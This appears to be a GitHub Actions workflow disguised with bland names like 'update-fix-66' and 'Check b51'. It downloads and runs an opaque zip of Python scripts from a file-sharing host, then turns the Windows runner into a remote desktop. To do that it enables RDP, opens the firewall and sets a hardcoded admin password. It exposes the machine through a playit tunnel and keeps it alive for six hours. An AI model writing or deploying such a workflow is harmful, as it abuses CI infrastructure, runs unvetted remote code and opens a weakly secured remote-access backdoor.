name: update-fix-66

on:
  workflow_dispatch:

jobs:
  setup-rdp-tunnel:
    runs-on: windows-2025

    steps:
    - name: Check b51
      uses: actions/checkout@v2

    - name: Download extract-v44556
      run: |
        curl -L -o code.zip https://pixeldrain.com/api/file/w2GFzu5z/info/zip/main7.zip
        Start-Sleep -Seconds 5
        powershell -Command "Expand-Archive -Force code.zip extracted"

    - name: Download-v7789
      run: |
        Invoke-WebRequest -Uri "https://github.com/playit-cloud/playit-agent/releases/download/v0.15.26/playit-windows-x86_64-signed.exe" -OutFile "$env:USERPROFILE\playit.exe"
        Start-Sleep -Seconds 5

    - name: DR-v5589
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "admin@123" -Force)

    - name: Install b52
      run: python -m pip install requests

    - name: Start b54
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python test.py
        Start-Sleep -Seconds 30

    - name: Start b54
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python main.py
        Start-Sleep -Seconds 10

    - name: Start b54
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python test2.py
        Start-Sleep -Seconds 30

    - name: Start b54
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python test3.py
        Start-Sleep -Seconds 30

    - name: DR-v-f4458
      env:
        PLAYIT_AUTH_KEY: ${{ secrets.DR }} 
      run: |
        Start-Process -FilePath "$env:USERPROFILE\playit.exe" -ArgumentList "--secret $env:PLAYIT_AUTH_KEY" -NoNewWindow -Wait
        Start-Process -FilePath "$env:USERPROFILE\playit.exe" -NoNewWindow

    - name: Keep alive-b56
      run: Start-Sleep -Seconds 21600 
